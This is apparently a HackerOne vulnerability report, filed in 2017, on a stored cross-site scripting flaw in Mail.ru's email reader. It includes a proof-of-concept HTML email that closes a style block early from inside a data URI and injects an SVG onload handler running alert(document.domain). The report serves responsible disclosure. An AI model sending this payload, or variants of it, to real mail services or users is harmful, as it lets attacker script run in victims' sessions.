Mail.ru: Stored XSS when you read eamils. <style>

2017-10-05T17:47:25
ID H1:274844
Type hackerone
Reporter ras-it
Modified 2018-03-13T13:17:40

Description

Hello team, I have found stored XSS when you read emails via <style> html tag.

PoC: ``` <!DOCTYPE html> <html> <head> <style> div { background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>"); background-color: #cccccc; } </style> </head> <body>

<div>lol</div>

</body> </html> ``` {F226715}